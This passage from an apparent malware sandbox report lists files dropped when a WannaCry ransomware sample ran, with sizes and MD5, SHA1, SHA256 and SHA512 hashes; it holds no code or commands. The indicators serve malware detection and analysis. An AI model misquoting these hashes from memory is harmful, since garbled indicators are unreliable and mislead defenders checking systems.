                                                                                      079ce1041cbffe18ff62a2b4a33711eda40f680d0b1d3b551db47e39a6390b21

                                                                                      SHA512

                                                                                      c661e0b3c175d31b365362e52d7b152267a15d59517a4bcc493329be20b23d0e4eb62d1ba80bb96447eeaf91a6901f4b34bf173b4ab6f90d4111ea97c87c1252

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\m.vbs

                                                                                      Filesize

                                                                                      279B

                                                                                      MD5

                                                                                      e9c14ec69b88c31071e0d1f0ae3bf2ba

                                                                                      SHA1

                                                                                      b0eaefa9ca72652aa177c1efdf1d22777e37ea84

                                                                                      SHA256

                                                                                      99af07e8064d0a04d6b706c870f2a02c42f167ffe98fce549aabc450b305a1e6

                                                                                      SHA512

                                                                                      fdd336b2c3217829a2eeffa6e2b116391b961542c53eb995d09ad346950b8c87507ad9891decd48f8f9286d36b2971417a636b86631a579e6591c843193c1981

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_bulgarian.wnry

                                                                                      Filesize

                                                                                      46KB

                                                                                      MD5

                                                                                      95673b0f968c0f55b32204361940d184

                                                                                      SHA1

                                                                                      81e427d15a1a826b93e91c3d2fa65221c8ca9cff

                                                                                      SHA256

                                                                                      40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd

                                                                                      SHA512

                                                                                      7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_chinese (simplified).wnry

                                                                                      Filesize

                                                                                      53KB

                                                                                      MD5

                                                                                      0252d45ca21c8e43c9742285c48e91ad

                                                                                      SHA1

                                                                                      5c14551d2736eef3a1c1970cc492206e531703c1

                                                                                      SHA256

                                                                                      845d0e178aeebd6c7e2a2e9697b2bf6cf02028c50c288b3ba88fe2918ea2834a

                                                                                      SHA512

                                                                                      1bfcf6c0e7c977d777f12bd20ac347630999c4d99bd706b40de7ff8f2f52e02560d68093142cc93722095657807a1480ce3fb6a2e000c488550548c497998755

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_chinese (traditional).wnry

                                                                                      Filesize

                                                                                      77KB

                                                                                      MD5

                                                                                      2efc3690d67cd073a9406a25005f7cea

                                                                                      SHA1

                                                                                      52c07f98870eabace6ec370b7eb562751e8067e9

                                                                                      SHA256

                                                                                      5c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a

                                                                                      SHA512

                                                                                      0766c58e64d9cda5328e00b86f8482316e944aa2c26523a3c37289e22c34be4b70937033bebdb217f675e40db9fecdce0a0d516f9065a170e28286c2d218487c

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_croatian.wnry

                                                                                      Filesize

                                                                                      38KB

                                                                                      MD5

                                                                                      17194003fa70ce477326ce2f6deeb270

                                                                                      SHA1

                                                                                      e325988f68d327743926ea317abb9882f347fa73

                                                                                      SHA256

                                                                                      3f33734b2d34cce83936ce99c3494cd845f1d2c02d7f6da31d42dfc1ca15a171

                                                                                      SHA512

                                                                                      dcf4ccf0b352a8b271827b3b8e181f7d6502ca0f8c9dda3dc6e53441bb4ae6e77b49c9c947cc3ede0bf323f09140a0c068a907f3c23ea2a8495d1ad96820051c

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_czech.wnry

                                                                                      Filesize

                                                                                      39KB

                                                                                      MD5

                                                                                      537efeecdfa94cc421e58fd82a58ba9e

                                                                                      SHA1

                                                                                      3609456e16bc16ba447979f3aa69221290ec17d0

                                                                                      SHA256

                                                                                      5afa4753afa048c6d6c39327ce674f27f5f6e5d3f2a060b7a8aed61725481150

                                                                                      SHA512

                                                                                      e007786ffa09ccd5a24e5c6504c8de444929a2faaafad3712367c05615b7e1b0fbf7fbfff7028ed3f832ce226957390d8bf54308870e9ed597948a838da1137b

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_danish.wnry

                                                                                      Filesize

                                                                                      36KB

                                                                                      MD5

                                                                                      2c5a3b81d5c4715b7bea01033367fcb5

                                                                                      SHA1

                                                                                      b548b45da8463e17199daafd34c23591f94e82cd

                                                                                      SHA256

                                                                                      a75bb44284b9db8d702692f84909a7e23f21141866adf3db888042e9109a1cb6

                                                                                      SHA512

                                                                                      490c5a892fac801b853c348477b1140755d4c53ca05726ac19d3649af4285c93523393a3667e209c71c80ac06ffd809f62dd69ae65012dcb00445d032f1277b3

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_dutch.wnry

                                                                                      Filesize

                                                                                      36KB

                                                                                      MD5

                                                                                      7a8d499407c6a647c03c4471a67eaad7

                                                                                      SHA1

                                                                                      d573b6ac8e7e04a05cbbd6b7f6a9842f371d343b

                                                                                      SHA256

                                                                                      2c95bef914da6c50d7bdedec601e589fbb4fda24c4863a7260f4f72bd025799c

                                                                                      SHA512

                                                                                      608ef3ff0a517fe1e70ff41aeb277821565c5a9bee5103aa5e45c68d4763fce507c2a34d810f4cd242d163181f8341d9a69e93fe32aded6fbc7f544c55743f12

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_english.wnry

                                                                                      Filesize

                                                                                      36KB

                                                                                      MD5

                                                                                      fe68c2dc0d2419b38f44d83f2fcf232e

                                                                                      SHA1

                                                                                      6c6e49949957215aa2f3dfb72207d249adf36283

                                                                                      SHA256

                                                                                      26fd072fda6e12f8c2d3292086ef0390785efa2c556e2a88bd4673102af703e5

                                                                                      SHA512

                                                                                      941fa0a1f6a5756ed54260994db6158a7ebeb9e18b5c8ca2f6530c579bc4455918df0b38c609f501ca466b3cc067b40e4b861ad6513373b483b36338ae20a810

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_filipino.wnry

                                                                                      Filesize

                                                                                      36KB

                                                                                      MD5

                                                                                      08b9e69b57e4c9b966664f8e1c27ab09

                                                                                      SHA1

                                                                                      2da1025bbbfb3cd308070765fc0893a48e5a85fa

                                                                                      SHA256

                                                                                      d8489f8c16318e524b45de8b35d7e2c3cd8ed4821c136f12f5ef3c9fc3321324

                                                                                      SHA512

                                                                                      966b5ed68be6b5ccd46e0de1fa868cfe5432d9bf82e1e2f6eb99b2aef3c92f88d96f4f4eec5e16381b9c6db80a68071e7124ca1474d664bdd77e1817ec600cb4

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_finnish.wnry

                                                                                      Filesize

                                                                                      37KB

                                                                                      MD5

                                                                                      35c2f97eea8819b1caebd23fee732d8f

                                                                                      SHA1

                                                                                      e354d1cc43d6a39d9732adea5d3b0f57284255d2

                                                                                      SHA256

                                                                                      1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

                                                                                      SHA512

                                                                                      908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_french.wnry

                                                                                      Filesize

                                                                                      37KB

                                                                                      MD5

                                                                                      4e57113a6bf6b88fdd32782a4a381274

                                                                                      SHA1

                                                                                      0fccbc91f0f94453d91670c6794f71348711061d

                                                                                      SHA256

                                                                                      9bd38110e6523547aed50617ddc77d0920d408faeed2b7a21ab163fda22177bc

                                                                                      SHA512

                                                                                      4f1918a12269c654d44e9d394bc209ef0bc32242be8833a2fba437b879125177e149f56f2fb0c302330dec328139b34982c04b3fefb045612b6cc9f83ec85aa9

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_german.wnry

                                                                                      Filesize

                                                                                      36KB

                                                                                      MD5

                                                                                      3d59bbb5553fe03a89f817819540f469

                                                                                      SHA1

                                                                                      26781d4b06ff704800b463d0f1fca3afd923a9fe

                                                                                      SHA256

                                                                                      2adc900fafa9938d85ce53cb793271f37af40cf499bcc454f44975db533f0b61

                                                                                      SHA512

                                                                                      95719ae80589f71209bb3cb953276538040e7111b994d757b0a24283aefe27aadbbe9eef3f1f823ce4cabc1090946d4a2a558607ac6cac6faca5971529b34dac

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_greek.wnry

                                                                                      Filesize

                                                                                      47KB

                                                                                      MD5

                                                                                      fb4e8718fea95bb7479727fde80cb424

                                                                                      SHA1

                                                                                      1088c7653cba385fe994e9ae34a6595898f20aeb

                                                                                      SHA256

                                                                                      e13cc9b13aa5074dc45d50379eceb17ee39a0c2531ab617d93800fe236758ca9

                                                                                      SHA512

                                                                                      24db377af1569e4e2b2ebccec42564cea95a30f1ff43bcaf25a692f99567e027bcef4aacef008ec5f64ea2eef0c04be88d2b30bcadabb3919b5f45a6633940cb

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_indonesian.wnry

                                                                                      Filesize

                                                                                      36KB

                                                                                      MD5

                                                                                      3788f91c694dfc48e12417ce93356b0f

                                                                                      SHA1

                                                                                      eb3b87f7f654b604daf3484da9e02ca6c4ea98b7

                                                                                      SHA256

                                                                                      23e5e738aad10fb8ef89aa0285269aff728070080158fd3e7792fe9ed47c51f4

                                                                                      SHA512

                                                                                      b7dd9e6dc7c2d023ff958caf132f0544c76fae3b2d8e49753257676cc541735807b4befdf483bcae94c2dcde3c878c783b4a89dca0fecbc78f5bbf7c356f35cd

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_italian.wnry

                                                                                      Filesize

                                                                                      36KB

                                                                                      MD5

                                                                                      30a200f78498990095b36f574b6e8690

                                                                                      SHA1

                                                                                      c4b1b3c087bd12b063e98bca464cd05f3f7b7882

                                                                                      SHA256

                                                                                      49f2c739e7d9745c0834dc817a71bf6676ccc24a4c28dcddf8844093aab3df07

                                                                                      SHA512

                                                                                      c0da2aae82c397f6943a0a7b838f60eeef8f57192c5f498f2ecf05db824cfeb6d6ca830bf3715da7ee400aa8362bd64dc835298f3f0085ae7a744e6e6c690511

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_japanese.wnry

                                                                                      Filesize

                                                                                      79KB

                                                                                      MD5

                                                                                      b77e1221f7ecd0b5d696cb66cda1609e

                                                                                      SHA1

                                                                                      51eb7a254a33d05edf188ded653005dc82de8a46

                                                                                      SHA256

                                                                                      7e491e7b48d6e34f916624c1cda9f024e86fcbec56acda35e27fa99d530d017e

                                                                                      SHA512

                                                                                      f435fd67954787e6b87460db026759410fbd25b2f6ea758118749c113a50192446861a114358443a129be817020b50f21d27b1ebd3d22c7be62082e8b45223fc

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_korean.wnry

                                                                                      Filesize

                                                                                      89KB

                                                                                      MD5

                                                                                      6735cb43fe44832b061eeb3f5956b099

                                                                                      SHA1

                                                                                      d636daf64d524f81367ea92fdafa3726c909bee1

                                                                                      SHA256

                                                                                      552aa0f82f37c9601114974228d4fc54f7434fe3ae7a276ef1ae98a0f608f1d0

                                                                                      SHA512

                                                                                      60272801909dbba21578b22c49f6b0ba8cd0070f116476ff35b3ac8347b987790e4cc0334724244c4b13415a246e77a577230029e4561ae6f04a598c3f536c7e

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_latvian.wnry

                                                                                      Filesize

                                                                                      40KB

                                                                                      MD5

                                                                                      c33afb4ecc04ee1bcc6975bea49abe40

                                                                                      SHA1

                                                                                      fbea4f170507cde02b839527ef50b7ec74b4821f

                                                                                      SHA256

                                                                                      a0356696877f2d94d645ae2df6ce6b370bd5c0d6db3d36def44e714525de0536

                                                                                      SHA512

                                                                                      0d435f0836f61a5ff55b78c02fa47b191e5807a79d8a6e991f3115743df2141b3db42ba8bdad9ad259e12f5800828e9e72d7c94a6a5259312a447d669b03ec44

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_norwegian.wnry

                                                                                      Filesize

                                                                                      36KB

                                                                                      MD5

                                                                                      ff70cc7c00951084175d12128ce02399

                                                                                      SHA1

                                                                                      75ad3b1ad4fb14813882d88e952208c648f1fd18

                                                                                      SHA256

                                                                                      cb5da96b3dfcf4394713623dbf3831b2a0b8be63987f563e1c32edeb74cb6c3a

                                                                                      SHA512

                                                                                      f01df3256d49325e5ec49fd265aa3f176020c8ffec60eb1d828c75a3fa18ff8634e1de824d77dfdd833768acff1f547303104620c70066a2708654a07ef22e19

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_polish.wnry

                                                                                      Filesize

                                                                                      38KB

                                                                                      MD5

                                                                                      e79d7f2833a9c2e2553c7fe04a1b63f4

                                                                                      SHA1

                                                                                      3d9f56d2381b8fe16042aa7c4feb1b33f2baebff

                                                                                      SHA256

                                                                                      519ad66009a6c127400c6c09e079903223bd82ecc18ad71b8e5cd79f5f9c053e

                                                                                      SHA512

                                                                                      e0159c753491cac7606a7250f332e87bc6b14876bc7a1cf5625fa56ab4f09c485f7b231dd52e4ff0f5f3c29862afb1124c0efd0741613eb97a83cbe2668af5de

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_portuguese.wnry

                                                                                      Filesize

                                                                                      37KB

                                                                                      MD5

                                                                                      fa948f7d8dfb21ceddd6794f2d56b44f

                                                                                      SHA1

                                                                                      ca915fbe020caa88dd776d89632d7866f660fc7a

                                                                                      SHA256

                                                                                      bd9f4b3aedf4f81f37ec0a028aabcb0e9a900e6b4de04e9271c8db81432e2a66

                                                                                      SHA512

                                                                                      0d211bfb0ae953081dca00cd07f8c908c174fd6c47a8001fadc614203f0e55d9fbb7fa9b87c735d57101341ab36af443918ee00737ed4c19ace0a2b85497f41a

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_romanian.wnry

                                                                                      Filesize

                                                                                      50KB

                                                                                      MD5

                                                                                      313e0ececd24f4fa1504118a11bc7986

                                                                                      SHA1

                                                                                      e1b9ae804c7fb1d27f39db18dc0647bb04e75e9d

                                                                                      SHA256

                                                                                      70c0f32ed379ae899e5ac975e20bbbacd295cf7cd50c36174d2602420c770ac1

                                                                                      SHA512

                                                                                      c7500363c61baf8b77fce796d750f8f5e6886ff0a10f81c3240ea3ad4e5f101b597490dea8ab6bd9193457d35d8fd579fce1b88a1c8d85ebe96c66d909630730

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_russian.wnry

                                                                                      Filesize

                                                                                      46KB

                                                                                      MD5

                                                                                      452615db2336d60af7e2057481e4cab5

                                                                                      SHA1

                                                                                      442e31f6556b3d7de6eb85fbac3d2957b7f5eac6

                                                                                      SHA256

                                                                                      02932052fafe97e6acaaf9f391738a3a826f5434b1a013abbfa7a6c1ade1e078

                                                                                      SHA512

                                                                                      7613dc329abe7a3f32164c9a6b660f209a84b774ab9c008bf6503c76255b30ea9a743a6dc49a8de8df0bcb9aea5a33f7408ba27848d9562583ff51991910911f

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_slovak.wnry

                                                                                      Filesize

                                                                                      40KB

                                                                                      MD5

                                                                                      c911aba4ab1da6c28cf86338ab2ab6cc

                                                                                      SHA1

                                                                                      fee0fd58b8efe76077620d8abc7500dbfef7c5b0

                                                                                      SHA256

                                                                                      e64178e339c8e10eac17a236a67b892d0447eb67b1dcd149763dad6fd9f72729

                                                                                      SHA512

                                                                                      3491ed285a091a123a1a6d61aafbb8d5621ccc9e045a237a2f9c2cf6049e7420eb96ef30fdcea856b50454436e2ec468770f8d585752d73fafd676c4ef5e800a

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_spanish.wnry

                                                                                      Filesize

                                                                                      36KB

                                                                                      MD5

                                                                                      8d61648d34cba8ae9d1e2a219019add1

                                                                                      SHA1

                                                                                      2091e42fc17a0cc2f235650f7aad87abf8ba22c2

                                                                                      SHA256

                                                                                      72f20024b2f69b45a1391f0a6474e9f6349625ce329f5444aec7401fe31f8de1

                                                                                      SHA512

                                                                                      68489c33ba89edfe2e3aebaacf8ef848d2ea88dcbef9609c258662605e02d12cfa4ffdc1d266fc5878488e296d2848b2cb0bbd45f1e86ef959bab6162d284079

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_swedish.wnry

                                                                                      Filesize

                                                                                      37KB

                                                                                      MD5

                                                                                      c7a19984eb9f37198652eaf2fd1ee25c

                                                                                      SHA1

                                                                                      06eafed025cf8c4d76966bf382ab0c5e1bd6a0ae

                                                                                      SHA256

                                                                                      146f61db72297c9c0facffd560487f8d6a2846ecec92ecc7db19c8d618dbc3a4

                                                                                      SHA512

                                                                                      43dd159f9c2eac147cbff1dda83f6a83dd0c59d2d7acac35ba8b407a04ec9a1110a6a8737535d060d100ede1cb75078cf742c383948c9d4037ef459d150f6020

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_turkish.wnry

                                                                                      Filesize

                                                                                      41KB

                                                                                      MD5

                                                                                      531ba6b1a5460fc9446946f91cc8c94b

                                                                                      SHA1

                                                                                      cc56978681bd546fd82d87926b5d9905c92a5803

                                                                                      SHA256

                                                                                      6db650836d64350bbde2ab324407b8e474fc041098c41ecac6fd77d632a36415

                                                                                      SHA512

                                                                                      ef25c3cf4343df85954114f59933c7cc8107266c8bcac3b5ea7718eb74dbee8ca8a02da39057e6ef26b64f1dfccd720dd3bf473f5ae340ba56941e87d6b796c9

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_vietnamese.wnry

                                                                                      Filesize

                                                                                      91KB

                                                                                      MD5

                                                                                      8419be28a0dcec3f55823620922b00fa

                                                                                      SHA1

                                                                                      2e4791f9cdfca8abf345d606f313d22b36c46b92

                                                                                      SHA256

                                                                                      1f21838b244c80f8bed6f6977aa8a557b419cf22ba35b1fd4bf0f98989c5bdf8

                                                                                      SHA512

                                                                                      8fca77e54480aea3c0c7a705263ed8fb83c58974f5f0f62f12cc97c8e0506ba2cdb59b70e59e9a6c44dd7cde6adeeec35b494d31a6a146ff5ba7006136ab9386

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\r.wnry

                                                                                      Filesize

                                                                                      864B

                                                                                      MD5

                                                                                      3e0020fc529b1c2a061016dd2469ba96

                                                                                      SHA1

                                                                                      c3a91c22b63f6fe709e7c29cafb29a2ee83e6ade

                                                                                      SHA256

                                                                                      402751fa49e0cb68fe052cb3db87b05e71c1d950984d339940cf6b29409f2a7c

                                                                                      SHA512

                                                                                      5ca3c134201ed39d96d72911c0498bae6f98701513fd7f1dc8512819b673f0ea580510fa94ed9413ccc73da18b39903772a7cbfa3478176181cee68c896e14cf

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\s.wnry

                                                                                      Filesize

                                                                                      2.9MB

                                                                                      MD5

                                                                                      ad4c9de7c8c40813f200ba1c2fa33083

                                                                                      SHA1

                                                                                      d1af27518d455d432b62d73c6a1497d032f6120e

                                                                                      SHA256

                                                                                      e18fdd912dfe5b45776e68d578c3af3547886cf1353d7086c8bee037436dff4b

                                                                                      SHA512

                                                                                      115733d08e5f1a514808a20b070db7ff453fd149865f49c04365a8c6502fa1e5c3a31da3e21f688ab040f583cf1224a544aea9708ffab21405dde1c57f98e617

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\t.wnry

                                                                                      Filesize

                                                                                      64KB

                                                                                      MD5

                                                                                      5dcaac857e695a65f5c3ef1441a73a8f

                                                                                      SHA1

                                                                                      7b10aaeee05e7a1efb43d9f837e9356ad55c07dd

                                                                                      SHA256

                                                                                      97ebce49b14c46bebc9ec2448d00e1e397123b256e2be9eba5140688e7bc0ae6

                                                                                      SHA512

                                                                                      06eb5e49d19b71a99770d1b11a5bb64a54bf3352f36e39a153469e54205075c203b08128dc2317259db206ab5323bdd93aaa252a066f57fb5c52ff28deedb5e2

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe

                                                                                      Filesize

                                                                                      20KB

                                                                                      MD5

                                                                                      4fef5e34143e646dbf9907c4374276f5

                                                                                      SHA1

                                                                                      47a9ad4125b6bd7c55e4e7da251e23f089407b8f

                                                                                      SHA256

                                                                                      4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79

                                                                                      SHA512

                                                                                      4550dd1787deb353ebd28363dd2cdccca861f6a5d9358120fa6aa23baa478b2a9eb43cef5e3f6426f708a0753491710ac05483fac4a046c26bec4234122434d5

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe

                                                                                      Filesize

                                                                                      20KB

                                                                                      MD5

                                                                                      8495400f199ac77853c53b5a3f278f3e

                                                                                      SHA1

                                                                                      be5d6279874da315e3080b06083757aad9b32c23

                                                                                      SHA256

                                                                                      2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d

                                                                                      SHA512

                                                                                      0669c524a295a049fa4629b26f89788b2a74e1840bcdc50e093a0bd40830dd1279c9597937301c0072db6ece70adee4ace67c3c8a4fb2db6deafd8f1e887abe4

                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\u.wnry

                                                                                      Filesize

                                                                                      240KB

                                                                                      MD5

                                                                                      7bf2b57f2a205768755c07f238fb32cc

                                                                                      SHA1

                                                                                      45356a9dd616ed7161a3b9192e2f318d0ab5ad10

                                                                                      SHA256

                                                                                      b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

                                                                                      SHA512

                                                                                      91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

                                                                                    • C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new

                                                                                      Filesize

                                                                                      10.5MB

                                                                                      MD5

                                                                                      23eb2219f159f103f802059681551101

                                                                                      SHA1

                                                                                      711e6f23c64d25e5cc3c065c8d957f4873709512

                                                                                      SHA256

                                                                                      c47ce07109441a6654488a1d152a6af429d57e99ab842c5fb246c4c6717f2043

                                                                                      SHA512

                                                                                      f9324151f7773dc019b239debc7be79a3974df738dc5b2b40c76579a38ec2acff325abaf695856bb4e536e43d76a112d35e0c21516a1aa4f85834a0ff1b8e45f

                                                                                    • C:\Users\Admin\Downloads\Ransomware.WannaCry.zip

                                                                                      Filesize

                                                                                      3.3MB

                                                                                      MD5

                                                                                      efe76bf09daba2c594d2bc173d9b5cf0

                                                                                      SHA1

                                                                                      ba5de52939cb809eae10fdbb7fac47095a9599a7

                                                                                      SHA256

                                                                                      707a9f323556179571bc832e34fa592066b1d5f2cac4a7426fe163597e3e618a

                                                                                      SHA512

                                                                                      4a1df71925cf2eb49c38f07c6a95bea17752b025f0114c6fd81bc0841c1d1f2965b5dda1469e454b9e8207c2e0dfd3df0959e57166620ccff86eeeb5cf855029

                                                                                    • C:\Users\Admin\Downloads\Ransomware.WannaCry.zip:Zone.Identifier

                                                                                      Filesize

                                                                                      26B

                                                                                      MD5

                                                                                      fbccf14d504b7b2dbcb5a5bda75bd93b

                                                                                      SHA1

                                                                                      d59fc84cdd5217c6cf74785703655f78da6b582b

                                                                                      SHA256

                                                                                      eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

                                                                                      SHA512

                                                                                      aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

                                                                                    • C:\Users\Admin\Downloads\Unconfirmed 929183.crdownload

                                                                                      Filesize

                                                                                      229KB

                                                                                      MD5

                                                                                      8683c0dc4c08bd11fe16b0d9f2642eec

                                                                                      SHA1

                                                                                      4e7e99b67af0ef9962daec076a677431a7deff0a

                                                                                      SHA256

                                                                                      23b6ff8191688c32f8d7326476b97c791618b9a207e2adb658d7ff871f3bb287

                                                                                      SHA512

                                                                                      ebd187d97bb1fa9f00e7901da180ee558f07d04d31a08f1f78e2309a289ced8f8c95f8248d543b81a8fa58e7cd6d50e8c41700c4a7e74126f26ae018ab489f29

                                                                                    • C:\Users\Public\Documents\aswOfferTool.exe

                                                                                      Filesize

                                                                                      2.3MB

                                                                                      MD5

                                                                                      682b0f6442803ed8aa0f172eb0b84cf5

                                                                                      SHA1

                                                                                      82a21900959e42fe4665c4f8a1cd6c68db9f1dc7

                                                                                      SHA256

                                                                                      df50e470eb476f3612a5e0cb506ef5ada0979fc670c796fdf398a8acee54b03d

                                                                                      SHA512

                                                                                      48c15bebcc3c9a46f8961ce7af7f4089d8c4a9f382842353637c1c2fedc16c35f68af7eeae7cc4829f2018a532e4102c8f74ca8eee647e01367179d2533e311c

                                                                                    • C:\Windows\System32\icarus_rvrt.exe

                                                                                      Filesize

                                                                                      49KB

                                                                                      MD5

                                                                                      97f5d0caaa1988c95bf38385d2cf260e

                                                                                      SHA1

                                                                                      255099f6e976837a0c3eb43a57599789a6330e85

                                                                                      SHA256

                                                                                      73ee549578ded906711189edcef0eedbc9db7ccbd30cf7776bd1f7dd9e034339

                                                                                      SHA512

                                                                                      ad099c25868c12246ed3d4ee54cef4df49d5276a5696ca72efa64869367e262a57c8ff1fb947ad2f70caef1d618849dbab2ec6161c25758d9f96733a7534b18f

                                                                                    • C:\Windows\Temp\asw-9f164a38-f15d-492c-9b2c-cd835b7d6279\avg-av-vps\bug_report.exe

                                                                                      Filesize

                                                                                      4.8MB

                                                                                      MD5

                                                                                      b1a75ca7946d7958b4a6236cfba98222

                                                                                      SHA1

                                                                                      3f7238efbe6c76eddbca1f0fab2ec42e165d173b

                                                                                      SHA256

                                                                                      89859bdb497d81204c601932e1be1fd208248f37d90548da39b8fa19e6d71c21

                                                                                      SHA512

                                                                                      79a073fdb6a7cbad501a7fc4b2e924e7dd9ed9bf1a2dc214ff0d8115df60abb4342d0b8caa74b988c67ea494b8f358e729e4d0e226184e5c6a8b294861030ec2

                                                                                    • C:\Windows\Temp\asw-9f164a38-f15d-492c-9b2c-cd835b7d6279\avg-av-vps\dump_process.exe

                                                                                      Filesize

                                                                                      3.4MB

                                                                                      MD5

                                                                                      c88671eb853f0ce492adfc781871e129

                                                                                      SHA1

                                                                                      5e19a30b36779eb9ef5bac7cf39112cf7823e2b8

                                                                                      SHA256

                                                                                      02b26cc48fb5c1f34969be1364c171159f563664bab9422189ade809785ab3ca

                                                                                      SHA512

                                                                                      1b6ea1504cd43f655880a1fd38704cfb50aa7b94c3bd42ac9d4b7576353bf24355b547e199f1901d541cd0dd2982645dbf12f8c35fa8df1fb33f0938dc7b18e5

                                                                                    • C:\Windows\Temp\asw-9f164a38-f15d-492c-9b2c-cd835b7d6279\avg-av\gcapi.dll

                                                                                      Filesize

                                                                                      867KB

                                                                                      MD5

                                                                                      3ead47f44293e18d66fb32259904197a

                                                                                      SHA1

                                                                                      e61e88bd81c05d4678aeb2d62c75dee35a25d16b

                                                                                      SHA256

                                                                                      e0d08b9da7e502ad8c75f8be52e9a08a6bcd0c5f98d360704173be33777e4905

                                                                                      SHA512

                                                                                      927a134bdaec1c7c13d11e4044b30f7c45bbb23d5caf1756c2beada6507a69df0a2e6252ec28a913861e4924d1c766704f1036d7fc39c6ddb22e5eb81f3007f0

                                                                                    • C:\Windows\Temp\asw-9f164a38-f15d-492c-9b2c-cd835b7d6279\avg-av\icarus.exe

                                                                                      Filesize

                                                                                      7.6MB

                                                                                      MD5

                                                                                      565c8b2269debc4903628d576a8bc47c

                                                                                      SHA1

                                                                                      9c85b48e4b1bfe95bbb9126e6d7718aa72a033ba

                                                                                      SHA256

                                                                                      6db67f96c01094215223f38c2703052bebe2a298521f8f0d8bed4492c3d1984c

                                                                                      SHA512

                                                                                      f3a011c8ba0f21106e69f9d57e12ddaef29665832d20e21566a3eab38825d510ecb8955915511e0273d02648d5ce9da4ab30d86c2cda3619fe82d9ebca5d1b6b

                                                                                    • C:\Windows\Temp\asw-9f164a38-f15d-492c-9b2c-cd835b7d6279\avg-av\icarus_ui.exe

                                                                                      Filesize

                                                                                      11.8MB

                                                                                      MD5

                                                                                      d93f0e473a80ffcb86f31dc72c1772f4

                                                                                      SHA1

                                                                                      0e003c7cae9fc2f2c981de22d2fd326454cf0f65

                                                                                      SHA256

                                                                                      03537ec10aa8ade09d10ff1377d396c2ee88a6cea0e270f7716ebf4cfaa408d9

                                                                                      SHA512

                                                                                      df025bf6e91bb5ae33c35d314031883c356706c61e881d9a181377354673c5d07873e23518fc6461fe0e8b1ccf1631af3cfa23d21b0d768426321a0216218d3e

                                                                                    • C:\Windows\Temp\asw-9f164a38-f15d-492c-9b2c-cd835b7d6279\avg-av\product-def.xml

                                                                                      Filesize

                                                                                      1.3MB

